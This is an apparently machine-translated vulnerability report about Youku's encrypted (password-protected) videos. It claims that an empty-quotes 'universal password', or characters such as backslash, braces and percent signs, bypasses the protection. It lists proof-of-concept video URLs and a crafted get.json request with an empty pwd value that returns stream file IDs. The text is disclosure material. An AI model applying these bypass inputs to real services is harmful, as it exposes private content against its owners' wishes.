Youku encrypted videos have multiple universal passwords that can bypass the restriction (odd flower vulnerability)
Youku encrypted videos with multiple universal passwords
Detailed description:
Enter two double quotation marks in the password box. For example, press OK to play all encrypted videos.
Management Supplement:
"" \ {}<> % Or a =
Allows you to bypass the video password.
Proof of vulnerability:
Http://v.youku.com/v_show/id_XMTMzMTI2OTUzNg==.html
Http://v.youku.com/v_show/id_XMTM0NTcwODg1Ng==.html
Http://v.youku.com/v_show/id_XMTM0NTM2NTk3Mg==.html
Http://v.youku.com/v_show/id_XMTM0NTM2NTg4MA==.html
Solution:
Is there a place to capture a http://play.youku.com/play/get.json? Vid = XMTM0NTM2NTg4MA ==& ct = 10 & ran = 437
Manually fill in pwd http://play.youku.com/play/get.json? Vid = XMTM0NTM2NTg4MA ==& ct = 10 & pwd = % 22% 22 & ran = 437
You can obtain the value stream_fileid, which is used to calculate the ep.
These values will not be discussed. The key point is that pwd can use "" universal password.